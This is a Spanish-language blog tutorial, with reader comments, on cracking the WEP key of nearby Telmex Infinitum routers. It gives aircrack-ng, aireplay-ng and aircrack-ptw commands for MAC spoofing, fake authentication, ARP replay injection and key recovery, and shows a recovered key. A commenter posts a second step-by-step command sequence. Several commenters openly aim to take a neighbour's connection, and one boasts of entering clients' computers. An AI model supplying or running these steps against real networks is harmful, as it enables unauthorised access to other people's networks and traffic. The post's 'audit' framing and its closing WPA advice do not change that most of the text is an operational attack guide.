Pues aquí me tienen, una vez que encontré una antena que me funcionara y al ver que había varias redes disponibles no me pude aguantar las ganas de auditar las contraseñas WEP que encontré a mi alrededor.
Hago la aclaración de que esta es una auditoría de seguridad pero les puedo adelantar la conclusión: La configuración por defecto de los accesos inalámbricos de Infinitum es altamente insegura.
Material necesario.
- Tarjeta de red inalámbrica, en mi caso use la que siempre me ha acompañado en este blog, la multimencionada ENUWI-G2.
- Una antena, esta es opcional, pero se puede utilizar para mejorar la calidad del enlace, puede ser la EZ-12 o la del escurridor de aluminio que a mi me ha funcionado muy bien.
- Una distribución de Linux, utilicé wifiway porque fue la que mejor me reconoció mi tarjeta de red inalámbrica, pero existen otras opciones como Wifislax o Bactrack .
Los pasos a seguir.
Hago la aclaración que esta serie de pasos es para wifiway, pero supongo que se pueden aplicar a las otras distros antes mencionadas. También modifique los datos reales, para proteger la identidad de los personajes (siempre quise escribir eso 😛 ).
Todos estos pasos se ejecutan desde una terminal (terminalofóbicos abstenganse 😉 )
1.- Verificar si se reconoce la tarjeta de red inalámbrica.
iwconfig
lo no wireless extensions. eth0 no wireless extensions. Warning: Driver for device wlan0 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20. Some things may be broken... wlan0 802.11b/g Mode:Monitor Channel=1 Bit Rate=11 Mb/s Tx-Power=11 dBm Retry:on Fragment thr:off Link Quality=84/100 Signal level=-236 dBm Noise level=-240 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Como pueden ver si la reconoció, la tarjeta es la wlan0, aunque me lanza una advertencia de que algo puede andar mal, y en efecto, la luz led de la tarjeta no prende, pero eso no evitó que funcionara para este experimento.
2.- Cambio de la mac address.
macchanger -m 00:11:22:33:44:56 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc) Faked MAC: 00:11:22:33:44:56 (Cimsys Inc)
Este paso lo realizo para no tener que acordarme de mi Mac Addres 🙂
3.- Búsqueda de las redes inalámbricas en los alrededores.
airodump-ng wlan0
CH 13 ][ Elapsed: 2 mins ][ 2008-03-16 11:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:00:00:00:00:01 2 4 0 0 6 22. WEP WEP 2WIRE000 11:11:11:11:11:11 15 53 0 0 1 54. WEP WEP INFINITUM0000 00:00:00:00:00:02 5 34 0 0 6 54. OPN linksys
En estos resultados vamos a tomar nota de varios datos importantes.
Como pueden ver la red que tiene una mejor calidad de señal es la INFINITUM0000 ya que el valor de PWR myor que el de los demás.
De ahí tomamos el BSSID (11:11:11:11:11:11), el canal en que esta operando (Canal 1) y el ESSID (INFINITUM0000), elegimos esta red porque tiene a mejor calidad de enlace y un método de protección (WEP) muy pobre.
4.- Iniciar la captura.
airodump-ng -w captura -c 1 wlan0
captura es el nombre del archivo que va a recibir la información que vamos a recolectar. Noten también que -c 1 indica que vamos a trabajar en el canal 1.
Es importante que no cerremos esta ventana, de lo contrario lo siguiente que hagamos no servirà de nada. Los siguientes pasos se hacen en una nueva terminal.
5.- Asociar la red inalámbrica.
aireplay-ng -1 0 -e INFINITUM0000 -a 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
11:26:36 Waiting for beacon frame (BSSID: 11:11:11:11:11:11) 11:26:36 Sending Authentication Request 11:26:36 Authentication successful 11:26:36 Sending Association Request 11:26:36 Association successful :-)
Sí aparece el mensaje de Association successful 🙂 estamos listos para continuar. Al principio batallé con este paso, si tienen algún problema es casi seguro que se trata de una mala calidad de señal, pueden estar muy lejos del punto de acceso inalámbrico.
6.- Iniciar la captura de paquetes.
aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0
Saving ARP requests in replay_arp-0316-112829.cap You should also start airodump-ng to capture replies. Read 598 packets (got 214 ARP requests), sent 1172 packets...(78 pps)
En este punto hay que estar al pendientes, cuando se logren más de 100,000 ARP’s terminamos el proceso (presionando Ctrl+C). Se puede tardar de 10 minutos a media hora dependiendo de la calidad del enlace.
7.- Buscar el archivo .cap con mayor tamaño y encontrar la contraseña.
Se acuerdan que en el paso 4 establecimos el nombre del archivo como captura (de hecho puede ser cualquier nombre), bueno pues es normal que en ocasiones se guarde más de un archivo, se distinguen porque les sigue un número, el que debemos de elegir es el que tiene mayor tamaño. Que aquí fue el archivo número 2.
aircrack-ptw captura-02.cap
This is aircrack-ptw 1.0.0 For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ allocating a new table bssid = 11:11:11:11:11:11 keyindex=0 stats for bssid 11:11:11:11:11:11 keyindex=0 packets=159646 Found key with len 05: 01 23 34 56 78
Y si todo salio bien en menos de 10 segundos obtendremos la contraseña, si en 10 segundos o menos, todo depende de la potencia de nuestro equipo.
Conclusiones.
Con eso es más que suficiente para encontrar la contraseña WEP de un enlace inalámbrico, lamentablemente este tipo de protección es el más utilizado por los Infinitum de Telmex por eso es poco recomendable dejar estos aparatos con su configuración de fábrica, lo mejor es ajustarla a otro tipo de protección como WPA, desconozco si lo 2wire lo permiten pero los linksys permiten restringir el acceso a ciertas Mac address lo que protege aún más una red inalámbrica.
ahh utilizo wifiway 1.0
Porque no puedo reunir DATAS si estoy muy cerca de la terminal que quiero Crakear? tengo mucha PWr y sin embargo no logro reunir DATAS.Saludos
Hola, antes de usar wifislax 3.1 mi antena usb «Realtek RTL8187B Wireless 802.11bg 54Mbps USB 2.0 Network Adapter» funcionaba, después de que usé una sola vez el wifislax ahora la antena no se activa, no responde ¿cómo puedo solucionar esto?
Ali, no tiene nada que ver eso. como experiencia personal te dire que lo que debe interesarte es si hay trafico en la red para poder capturar las IVs necesarias para la desencriptacion. Eso lo ves bajo la columna DATA que es la que indica la cantidad de transferencia de datos en la red. Para explicarlo un poco, las conexiones cifradas con wep, constantemente envian paquetes de datos hacia la red conectada para verificar que aun esté validado en él, es por esa razon que podemos realizar captura de paquetes de datos y la razon de la debilidad del cifrado WEP. Por otra parte, el Cifrado WPA solo envía un paquete de datos con la contraseña al iniciar la conexion, llamado Handshake, por lo cual es teoricamente casi imposible desencriptar la clave de red sin un buen diccionario de datos, que contenga millones de posibles conbinaciones de claves para encontrar la que sea valida. Otra forma de encontrar claves wep usando aircrack-ng en vez de aircrack-ng seria:
– paso 1: poner la tarjeta en modo monitor airmon-ng start [interfase de red(normalmente wlan0)]
– Paso 2: escanear las redes airodump-ng [interfase de red]
y seleccionar la red que vamos a «auditar» es importante tomar nota de la direccion MAC y del canal que ocupa indicado bajo la columna CH
– Paso 3: fijar la red que vamos a auditar airodump-ng -c [canal] –bssid [direccion mac] -w [archivo donde guardaremos las capturas] [interfase de red]
hecho esto, abrimos una nueva terminal y realizamos la asociacion con la red que queremos auditar
– Paso 4: en la nueva terminal tecleamos aireplay-ng –fakeauth 0 -e [nombre de la red] -a [direccion mac de la red] [interfase de red] si te da error prueba con aireplay-ng –fakeauth 600 -o 1 -q 10 -e [nombre de la red] -a [direccion mac] [interfase de red]
Hecho esto, en la misma terminal hacemo lo que indica el paso 5.
– Paso 5: tecleamos aireplay-ng -3 -b [direccion mac] [interfase de red] -x 250 y si te vas a la primera terminal donde fijamos la red a auditar, ya debes empezar a notar que estas inyectando trafico cuando la columna DATA comienza a aumentar rapidamente. Normalmente juntando unas 40.000 IVs (en la columna DATA es suficiente. llegando a esa cantidad presiona CRTL-C para dejar de capturar IVs
– Paso 6 y final: obtenemos la clave de red ejecutando: aircrack-ng -z -b [direccion mac] [nombre del archivo que utilizaron para la captura-01.cap] y ya tienen su clave de red.
Esta es la manera en la que yo obtengo mis claves de red usando aircrack-ng en cualquier linux. Obviamente debo instalarlo primero, y pues por eso existen estas Distros especializadas para ello como WifiSlax, WifiWay, Backtrack, Russix etc.
Saludos a todos y espero que les sea de utilidad
Linuxman, una consulta, has podido «auditar» redes wifi con cifrado wpa/tkip o wpa2? si es asi como lo hiciste? será usando un diccionario o tabla rainbow??
hola a todos, muy buen tutorial para auditar redes, de veras que esta bueno! yo hace tiempo ya que «audito» redes inalambricas y normalmente lo hago con aircrack-ng que instalo a mi linux de turno (ahora con sabayon 5.2). Para quienes consultan por el modelo de la tarjeta a usar, les diré que no siempre tiene que ver la marca de la tarjeta, sino el chipset que tiene incorporado. Esto realmente es un dolor de cabeza puesto que no siempre la misma marca de tarjeta o adaptador tiene el mismo chipset. Como experiencia personal puedo decir que las tarjetas y adaptadores que vienen con Chipset Zydas, Atheros y RaLink funcionan de maravilla. Actualmente tengo una d-link DWA-510 en mi Desktop y estoy conectado sin problemas. Traten de averiguar por el chipset mas que el modelo de la tarjeta y de seguro que dan con lo que necesitan, Saludos desde Chile
buenas que pasa cuando te ecnutras un AP y donde dice MB solo te indica 54 sin el punto que significa el punto ya que cuando inyecto paquetes solo cuenta el de Read packets
Saludos
hola linux man..muy bueno el post, pero tienes idea si mi tarjeta soporta todo los programas necesarios o tendre que comprar otra?
mi tarjeta es un Realtek RTL8187B Wireless 802.11bg 54Mbps USB 2.0 Network Adapter
muchas gracias
La lección es, no uses wep para «proteger» una red inalambrica 🙂
gracias por enseñar COMO ROBARSE EL INTERNET
Alianza: Me suena a que capturaste muy pocos paquetes… cuantos ARP Capturaste?
AMIGO Y QUE PASA SI ME APARESE ESTO COMO PUEDO ENCONTAR LA CLEVE DE LA DIRECCION stats for bssid 00:22:A4:60:97:B9 keyindex=0 packets=12723
wifiway ~ # aircrack-ptw archivo-01.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:22:A4:60:97:B9 keyindex=0
allocating a new table
bssid = 00:1D:5A:22:AE:E1 keyindex=0
allocating a new table
bssid = 00:1F:9F:DE:7E:7E keyindex=0
allocating a new table
bssid = 00:24:17:82:5B:95 keyindex=0
allocating a new table
bssid = 00:25:68:C3:75:EE keyindex=0
allocating a new table
bssid = 00:18:D2:00:81:B0 keyindex=0
stats for bssid 00:22:A4:60:97:B9 keyindex=0 packets=12723
stats for bssid 00:1D:5A:22:AE:E1 keyindex=0 packets=1
stats for bssid 00:1F:9F:DE:7E:7E keyindex=0 packets=2
stats for bssid 00:24:17:82:5B:95 keyindex=0 packets=2
stats for bssid 00:25:68:C3:75:EE keyindex=0 packets=1
stats for bssid 00:18:D2:00:81:B0 keyindex=0 packets=5
wifiway ~ #
amigos, tengo un notebook con una tarjeta de red Realtek RTL8187B Wireless 802.11bg 54Mbps USB 2.0 Network Adapter
He descargado el wifislax 3.1 y el wifiway 1 final, de ambos me he hecho el live CD
y al momento de bootear desde cl CD y utilizar cualquiera de estos 2 softwares, ambos no me reconocen la tarjeta de red…
necesito la ayuda de alguien porfavor…
mi mail es mauriciorh90@gmail.com
Muchas gracias ante cualquier ayuda!!
Rosario: Estan en la misma carpeta en la que estas trabajando, si no sabes.. teclea pwd y te dirá en que directorio estas.
Hola , no puedo hayar los archivos (captura), dónde puedo encontrarlos? Soy un poco nueva en linux. Tenerme paciencia 🙂
Que onda !
Pos ya adelante ese problema, el dump lo apunte al rtap0 y el replay lo apunte a la wifi, ya con esto no se trabo la compu.
Saludos
Que onda!
Buen tutorial !, va mi caso..
Tengo una wirelles:Intel 3945ABG y OS:wifislax 3.1 y se congela mi portatil al ejecutar el «aireplay -1», la he visto varias veces caer en coma sin hacerla reaccionar.
Antes de ello, cuando ejecuto el script para levantar mi wireless me crea dos interfaces la «wifi0» y «rtap0» por ahi va la el problema?
Saludos.
Gracias por el tuto, ahora ya soy auditor; soy egresado del tec y de la luis aguirre, Saludos
Que necesito para que el wifiway me reconosca el adaptador; ¿controladores de linux? o solo agarra el programa
Muy bue tutorial Linuxman, segui tus intrucciones paso a paso y me funcionó a la primera. Gracias
mark… la duda mas frecuente… tu enuwi es blanca o es gris?
La blanca no funciona, la gris sip :p
que tal linuxman.
el wifiway no me detecta mi tarjeta(enuwi-g2 usb)
como puedi hacer para que me la detecte, llevo mucho tiempo y no pudeo podrian ayudarme
Oscar, afortunadamente Backtrack es un live cd, porque no pruebas la laptop con backtrack antes de comprarla.
En el caso de las netbook tienes que revisar si existe un backtrack en usb.
Te recomiendo que te acerques a los compañeros de Kernel Panic ( http://web.archive.org/web/20110907040221/http://kernelpanic.org.mx:80/ ), ellos tienen más experiencia con este tipo de distribuciones.
hola linuxman quiro comprar una laptop cual me recomiendas que pueda usar con back track me venden una acer pentium2core me servira y acerca de las notbock con sistema operativo linux limpus soportan back track te agradesco tu tiempo
mm pues es la blanca :p jajaja.. ni modo gracias brother
@Nen, ¿Que version de enuwi tienes?, es blanca (no funciona) o una gris (es la que si furula)
ke tal linuxman, mira yo tengo mi laptop con una ipw3945 integrada y pues bueno, hice una antena con una tarjeta de red ENUWI-G2 en Wifiway, bueno… primero que nada no logro echar andar el ENUWI, lo detecta y todo al hacer iwconfig pero al hacer airodump-ng wlan1 (asi es como lo detecta el iwconfig) no me detecta ninguna red inalambrica… a que se puede deber esto?..
a mi me pasa igual,tengo el archivo de captura de 300 megas y 500.000 rp,pero no me lo abre ni nada ,alguna solucion?
Igual el mismo problema que los anteriores, no puedo hayar los archivos «captura», dónde puedo ubicarlos? Aclaro, soy bastante novato en linux. Gracias
y el archivo captura-02.cap … es el de mayor tamaño?????
Antes de ejecutar la sentencia :
aircrack-ptw captura-02.cap
Hay que cerrar las consolas que se tiene abiertas y terminar con Ctrl+C las sentencia que estan corriendo ?? Por ej: el airodump y airplay
Es cierto que si el archivo CAPTURA esta en /root no funciona ? Donde se debe ejecutar el comando que lo genera ?
Gracias
Favor de auxiliarme, al ejecutar la ultima sentencia
aircrack-ptw captura-02.cap
No se obtiene nada y ya llevo mucho intentos, me dice:
No se ha encontrado una clave, desea continuar con aircrack-g S,n
Le selecciono S y escojo de una lista la red y tampoco.
Que puedo hacer ?
Teóricamente es posible Anais, pero es mucho más complicado. El tamaño de la muestra es mucho más grande y los programas son diferentes.
Nunca lo he intentado.
Hola
Hay alguna forma para sacar claves WPA??
tengo un adaptado tb con el REALTEK 8187L y lo primero que debes escribir es airmon-ng start wlan0, que es el ultimo paso que haces….. prueba despues todos los demas pasos.
he usado, wifislax 3.1 y wifi-way 1.0
Laaaaaaastimaaaaaa Sunday, la enuwi de color blanco y de forma rectangular no funciona para este experimento. Tiene que ser la de color gris.
En los comentarios recomiendan una linksys que también funciona.. 😀 Saludos !!!
Hola de nuevo
uppsss perdon por hacer mi comentario anterior demasiado largo…
ademas no sabia que el simbolo (#) marcaba demasiado las letras
Lo siento
Hola linuxman
Necesito de tu ayuda ya que soy nuevo en el mundo linux.
Mi problema, para empezar tengo la enuwi-g2 es una cosa blanca y de forma rectangular algo tosca, a la hora de darle iwcongig me sale esto…..
# iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wmaster0 no wireless extensions.
wlan0 IEEE 802.11bg ESSID:»»
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
pan0 no wireless extensions.
mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
mon1 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Si no me equivoco ya fue reconosida ¿O NO?
y al darle el cambio de mac me sale lo siguiente….
# macchanger -m 00:11:22:33:44:56 wlan0
Current MAC: xx:xx:xx:xx:xx:xx (unknown)
ERROR: Can’t change MAC: interface up or not permission: Device or resource busy
Como soy nuevo en esto no se si primero hay que cambiar el #mac para poder continuar
Porque intente saltarme ese paso pero igual tengo problemas sale lo sig:
# airodump-ng wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start wlan0 ‘
Sysfs injection support was not found either.
e hice el airmon-ng start wlan0 …
# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Realtek 8187L rtl8187 – [phy0]
(monitor mode enabled on mon1)
mon0 Realtek 8187L rtl8187 – [phy0]
necesito de tu ayuda por favor ya estoy desesperado
Haaa por cierto no se si tenga que ver pero lo estoy intentando con ubuntu 8.10
!!!GRACIAS por su atencion¡¡¡
Alguien me puede ayudar a saber qué tarjetas puedo usar para auditar, si mi lap tiene un procesador core 2 duo T5250? se los agradecería mucho.
gracias marco, la buscarè pero si se me hace carona, me darè una vuelta en la plaza
el cuate de ML, tiene varias y calificaciones positivas es de veracruz,
ahhh como extraño mis 2200bg
gracias y saludos a linuxman
Hola, soy el posteador #43, ibizurf la tarjeta esta muy escasa te recomiendo que mejor compres una Linksys USB modelo WUSB54GC, esa la probe y funciono perfectamente con este tutorial. la tarjeta la puedes conseguir en la plaza de la computacion por el metro salto del agua. la encore ya no hay, despues de que compre la que tengo actualmente fui por otra y ya no habia, la linksys funciona perfectamente pero es algo cara (350-400 pesos) en promedio buscala en el piso de arriba es mas barata. saludos y espero te ayude. Marco
Cuidado con las que venden en mercado libre, tienen las imagenes de la tarjeta encore plateada pero te mandan la blanca que no funciona con ninguno de los discos de linux. Si este comentario no es apropiado en este lugar pido linuxman que lo borres. Saludos desde la ciudad de la esperanza jajaja.
Hola linuxman, te mando un correo, necesito saber si podemos contactar al posteador numero
# 43 | marco
July 31, 2008 @ 6:06 pm
por medio de tu admin status, plis mandarle un correo para ver donde compro su Encore en el DF, yo soy de estos lugares y la he buscado sin hallar, la venden en ML, pero me saldria $80 mas de envio
Saludos y gracias de antemano
Aprendiz: ¿Qué tarjeta de red estas usando?, si no te aparece ninguna al teclear iwconfig probablemente es porque tu tarjeta de red no fue reconocida.
Saludos.
hola, estoy haciendo los pasos que indicas, pero no me reconoce la tarjeta de red, me dice q no hat¿y ningun dispositivo y es una como la que indicas, faltara el driver para linux?
hola linuxman yo adquiri la tarjeta enuwi -g2 RTL8187B y tengo el mismo problema que DELOX el wifiway no me reconoce la tarjeta cualqier ayuda la agradeceria
Muy buen articulo, que pasa si el nombre de clave es distinto a los de prodigy, por ejemplo 2 palabras, con espacio intermedio, al intentar la asociación no reconoce este tipo de sintaxis, hay que poner algo enmedio de las palabras? ejemplo:
nombre de red regular prodigy3452
nombre que no reconoce: red manuel
HOla Linuxman, intente con una laptop hp con tarjeta IPW3945, todo parecía funcionar bien con el wifislax 3.1 pero al intentar asociar la tarjeta con el AP solo veo que envia:
Sending Authentication Request
y despues de eso la maquina se congela, alguna sugerencia de que puede estar pasando?
Ya me habian comentado de esta nueva versión de la enuwi-g2, nada más espero que no hayan cambiado el chipset… tendría que conseguir una de estas.. alguien puede pegar aqui el archivo readme del driver de linux, el que viene en el cd.
hola linuxman:
logré conseguir la tarjeta que tu mencionas (ENUWI-G2), pero es de color blanca no gris, y tengo un problema no me detecta la tarjeta,¿que puedo hacer?, agradecería tu respuesta ya que soy nuevo en esto y estoy muy interesado.
saludos
pega aqui el resultado del comando iwconfig , please 😀
hola linuxman
ya intenté con los comandos normales y al momento de poner «airodump-ng wlan0» me aparece «wlan0 is not network interface» y al poner ya sea «airodump-ng eth2» no aparecen las señales. Y esta prendido el interruptor de la tarjeta.
¿que puedo hacer?
gracias
hola, Yo mismo me respondo: lo que paso es que yo compre una tarjeta encore del mismo modelo pero ya es una blanca (nuevo modelo), la cual no sirve con ningun cd linux, de milagro encontre la que dice linuxman una plateda (por cierto muy dicil de encontar aqui en la cd. de mexico), con esa obtuve la clave wep de mi infinutum en 10 minutos sin ningun contratiempo.
Gracias linuxman por ese sencillo tutorial. Marco
hola, yo tengo una tarjeta realtek rtl8187b wireless 802.11g 54mbps usb 2.0 network adapter y no me la ha reconocido el wifiway, que puedo hacer. (pc con windows xp) doy iwconfig y aparece:
lo no wireless extensions.
eth0 no wireless extensions.
gracias
bueno, Ya intentaste el paso con los comandos normales???? estas seguro que el interruptor de tu lap sobre la tarjeta wireless esta prendido? solo para checar.
Hola linux man tu manual es muy bueno lo explica todo detalladamente pero me atoré y quería ver si me podrías ayudar:
en el 1er paso al escribir iwconfig me aparece lo sig.:
lo no wireless extensions
eth0 no wireless extensions
eth1 no wireless extensions
Warning:Driverfor device eth2 has been compiled with version 22 of Wireless Extension, while this program supports up to version 20.
Some things may be broken…
eth2 IEE 802.11b/g ESSID:off/any Nickname:»Broadcom 4311″
Mode:MAnaged Acces Point:invalid
RTS thr:off Fragment thr:off
Encryption key:off
Link Quality=0/100 Signal level=-256dBm Noise level=-256 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Por lo que en el segundo paso cambié de «airodump-ng wlan0» a «airodump-ng eth2»
pero no me aparece ninguna red a pesar de que estoy cerca de alguna.
¿que puedo hacer?
agradecería que me contestara
un saludo
hola linuxman antes que nada gracias por responder.ya encontre mi clave (WEP)es increible como se decifran estas claves y mejor la voy cambiar (WPA 2)ya que el costo de tener el servicio es muy caro bueno eso es todo.GRACIAS…..
hola linuxman antes que nada gracias por responder.ya encontre mi clave (WEP)es increible como se decifran estas claves y mejor la voy cambiar (WPA 2)ya que el costo de tener el servicio es muy caro bueno eso es todo.GRACIAS…..
hola linuxman antes que nada gracias por responder.ya encontre mi clave (WEP)es increible como se decifran estas claves y mejor la voy cambiar (WPA 2)ya que el costo de tener el servicio es muy caro bueno eso es todo.GRACIAS…..
Juan Carlos: Si usaste aircrack-ptw (no aricrack) debe ser muy rápido. Ahora yo tuve un problema muy similar con aircrack-ptw y era debido a que la muestra no era muy buena,¿Estás muy lejos del punto de acceso?, ¿Cuanto tiempo tardas en obtener la muestra?
hola liniuxman e siguido todos los pasos que decribes.tengo el mismo hardware y ya en el ultimo con aircrack tarda demasiado en encontrar mi clave wep e dejado toda la noche encendida mi compu pero no encuentra nada.¿que estare haciendo mal??
No creo que sea problema Cesar, yo lo he hecho en Celerons con 256 MB en ram y lo hace en 5 segundos, tu preocupate por tener una buena muestra, lo demás es muy sencillo.
Pero recuerda que el proposito de este post es demostrar lo sencillo que es brincarse una encripción wep.
HOLA QUE TAL MI PREGUNTA ES QUE REQUIRIMINETO MINIMO DE PROCESADOR DEBO TENER PARA PODER DESENCRIPTAR LAS CLAVES CON AIRCRACK CON MAYOR RAPIDES. YO TENGO UNA IBM THINKPAD T22 A 900MHZ CON RAM 384MB.
Hola oye una duda, despues de aver encontrado la key como me conecto con esta clave en wifiway
y como conviertes una clave wpa2 a wep sin tener que modificarla en el router?
obviamente conociendo la clave wpa2
es simple… instala virtualbox, esta disponible en muchas distros de linux o si quieres, nos vemos en el flisol .. 😛
linuxman como se virtualiza, es diferente para cada distro, o por donde busco informacion
saludos y felicidades
Pues esta mejor, te ahorras varias reiniciadas virtualizando wifiway 😀
Linuxman: Ya «correjí» mi problema, virtualicé wifiway en mi Debian y utilice la Inalámbrica enuwi =), me quedó la duda del porqué no inyecta tráfico de manera normal, tuve que virtualizarlo para que me detectara un hardaware genérico y así usar la usb sin problemas.
Pues creo que ese detalle lo revisaremos en el flisol compañero 😛
Si, me detecta las 2, la interna y la de USB, ya probe dando de baja la interna y hasta desactivando el modulo bcm43xx y aun nada. no inyecta :S
Revisaste cuantas tarjetas inalámbricas estaban activadas en tu equipo portátil?
Ya logre sacar la clave wep, lo hice con la tarjeta inalámbrica Enuwi-g2, wifiway en una Desktop. Hice los mismos pasos de este tutorial y la logró sacar a la perfección.
Solo que tengo una duda muy grande, con la misma distro wifiway, con la misma tarjeta inalámbrica, pero con mi laptop dell inspiron 1521 no logro hacer la inyección, continua ese problema en mi laptop, que podra ser?
Lo que ven es lo que uso y lo que me funcionó…
Fabian, Antonio:
¿Que tan lejos están del punto de acceso?, yo uso la antena del escurridor de aluminio para mejorar la calidad del enlace… Ustedes ¿Que usan?
Fabian: cambia un mac adress por una que puedas recordar facilmente:
Linuxman: ya probé con wifiway y es el mismo resultado, a la hora de inyectar, no me aparecen los arp, se queda sin hacer nada, esto con la wifislax y wifiway, que por cierto las 2 distros me las detecta bien la Enuwi-g2.
Otra cosa , cuando hiciste estos pasos con la INFINITUM0000, habia trafico en esa red?, es decir, habian personas conectadas trabajando normalmente ?
excelente Tuto… Pero tengo problemas al momento de asociarme a al router. Me indica Unsuccesful..! :-(, Mi terjeta es la integrada de ina Compaq, creo es Broadcom..! Pudieran ayudarme… Gracias!!
Intenta con wifiway y con la Enuwi-g2 esta fue la combinación ganadora… con wifislax no consegui mucho debido a que los driver de mi tarjeta no funcionaban.
Parece que no logre inyectar , ni con la broadcom ni con la ENUWI-G2 USB, pero parace que ya encontre la solución, probablemente fue el excaso trafico que habia aqui en mi casa, según la documentación oficial dice lo siguiente: «Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.»
Probablemente ese sea mi fallo, o tu que piensas?
linuxman, tengo esa misma tarjeta ke usaste en el tutorial, con wifislax no puedo hacer que inyecte, probare con wifiway, hiciste algun procedimiento para configurar la tarjeta?
Estoy apunto de lograrlo con una Broadcom con el wifislax 3.1, pero me kedo hasta el paso de inyecciòn, ya que todavia no logro configurar mi tarjeta para que haga inyeccion, he probado con los asistentes para cargar los mòdulos y parace que no funcionan con mi tarjeta, eh probrado el aireplay-broadcom-ng y nada.
Que tal Pete… use la versión 0.8 de wifiway y los pasos que lees fueron los necesarios para lograr el objetivo.
Linuxman
excelente tutorial, pero unas dudas, que version usaste del wifiway y como se hace que la tarjeta usb encore este en modo monitor?, puesto que yo tengo una igualita, saludos
Muy bueno el artículo Linuxman, pero me quda alguna dudilla que seguro que puedes resolverme. ¿Esto puede hacerse con un ordenador portátil? o necesito un ordenador de sobremesa para poder instalarle una tarjeta configurable en modo captura???
Mil gracias.
Un saludo.
Jorge los dirvers de la broadcom ya vienen parchados en wifislax, quiza te hace falta lanzar el driver desde el menu del wifislax prueba en asistencia chipset luego busca el de tu tarjeta broadcom, creo que desde la version 2 de wifislax vienen ya listos para modo monitor, creo pero no estoy seguro lo que si estoy seguro es que la version 3.1 funciona correctamente con el chipset de broadcom otra cosa si usas wifislax tendras que sustituit aireplay-ng por airplay-broadcom-ng esto porque hwagm compilo asi los drivers para que funcionaran correctamente. Saludos
Misterios jack .. misterios :D, No eres Jack Bahuer .. ¿o si?
Y digo yo, ¿como haces todo ello sin configurar la tarjeta en modo monitor?
Bueno pues puedes probar wifislax… o , cuando termina de cargar wifiway hay una opcion que dice
autox
(o algo parecido) para que te configure la pantalla antes de iniciar, si ya lo intentaste prueba sin esa opciónuse wifiway, lo raro es que en PWR todas me aparecen con -1 pero si tengo cerca las conexiones…trate de entrar otra vez hoy pero no se ve bien wifiway al tratar de entrar y no puedo ajustarle nada del video al tratar de cambiar la resolucion me saca al menu principal :S
cabe destacar que soy un principiante en esto, pero con ganas 😀
Usaste wifiway?? .. ya probaste Wifislax ?
Tu tarjeta de red es una broadcom?
:S a mi me aparece un error a la hora de correr el aireplay-ng «is your bcm34xx driver patched»
Justo lo que necesitaba, he encontrado manuales pero ninguno tan claro como el tuyo, espero ahora si poder ver la clave de mi vecino jeje.. ya que con los otros manuales nomas no logro obtener muchos ivs ojala ahora con el wifiway lo pueda conseguir.
Linuxman
Sin palabras exelente este articulo y tu blog.
Es la primera que lo visito.. y me parece estupendo ademas encuentro informacion sobre linux que no encuentro en varios foros y paginas.
Gracias por la informacion de la tarjeta de red encore. y la colocare en marcha.
Felicidades por el articulo Linuxman, te has aventado otro 10.
Yo andaba en las mismas solo que no he localizado un buen ‘escurridor de aluminio’para mi antena pero gracias a tu artículo ya tengo mi tutorial paso a paso.
asi es .. es lo mesmo en las demas distros… PUES EN HORA BUENA.. todavia me acuerdo de hace mas de 3 años que andaba esnifeando la ciudad.. jeje estaba tan insegura inalambricamente que casi entrabas al baño.. juar juar no se diga de megachafa que scaneas su red y wuala ay dios entras a las compus de los clientes… no se trata de ser paranoicos pero es una super obligacion de todo ingeniebrio perdon ingeniero que proteja su red y si no pa que esta ipcop.. PERO A POCO NO SE SIENTE LA ADRENALINA.. JEJE YA SON VARIOS AÑITOS HACIENDO LA VIOLACION DE ESTOS APARATILLOS DE POCA SEGURIDAD.. QUE SOLO ME QUEDA DECIR… YA DEJEN QUE LA SEÑAL INALAMBRICA SEA HABIERTA PORFAVOR.. YA AY PAISES EN EL MUNDO QUE HACE AÑOS A SU POBLACION ENTREGAN EL INTERNET GRATIS.. LO PEOR NOS VENDEN 4 MEGAS COMO SI FUERA LO ULTIMO DE LO ULTIMO.. CUANDO EL GOBIERNO ESPAÑOL 4 MEGAS ES LO QUE REGALAN EN SUS PLAZAS PUBLICAS.. NO SE DIGA DE JAPON QUE DE 60 MEGAS PASARON A 100.. PERO ESTO AQUI Y POR LO TANTO TE FELICITO POR TU MANUALITO TE ASEGURO QUE LE AHORRASTE MESES A VARIOS QUE ENTREN AQUI..
